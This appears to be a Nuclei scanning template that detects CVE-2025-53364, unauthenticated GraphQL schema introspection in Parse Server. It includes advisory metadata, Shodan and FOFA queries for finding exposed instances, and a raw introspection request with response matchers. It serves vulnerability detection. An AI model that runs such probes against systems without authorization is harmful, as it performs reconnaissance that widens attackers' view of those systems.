id: CVE-2025-53364

info:
  name: Parse Server - GraphQL Schema Information Disclosure
  author: securitytaters
  severity: medium
  description: |
    The Parse Server GraphQL API previously allowed public access to the GraphQL schema without requiring a session token or the master key. While schema introspection reveals only metadata and not actual data, this metadata can still expand the potential attack surface.
  impact: |
    Unauthenticated attackers can access GraphQL schema metadata without authentication, potentially expanding the attack surface through exposure of API structure and query capabilities.
  remediation: |
    Upgrade Parse Server to the latest version that requires authentication for GraphQL schema introspection.
  reference:
    - https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
    - https://www.miggo.io/vulnerability-database/cve/CVE-2025-53364
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53364
  metadata:
    verified: true
    max-request: 1
    vendor: parseplatform
    product: parse-server
    shodan-query:
      - http.title:"parse server" || "parse-server"
      - http.title:"parse dashboard"
    fofa-query: title="parse dashboard"
  tags: cve,cve2025,parse,graphql,exposure,vuln,vkev

variables:
  appid: "{{appid}}"

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Parse-Application-Id: {{appid}}

        {"query":"{\n  __schema {\n    types {\n      name\n    }\n  }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data":{"__schema":{"types":[{"name":"Upload"},'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a0046304402202e66fd1e90e8b2fd24840e3561605488bd80c7adb7d2c1ae6a7d4a62255a2ed4022007774c9c5716f3c2bdd43748669e2b36261219159ecd2ef03ab03929fb0cfd99:922c64590222798bb761d5b6d8e72950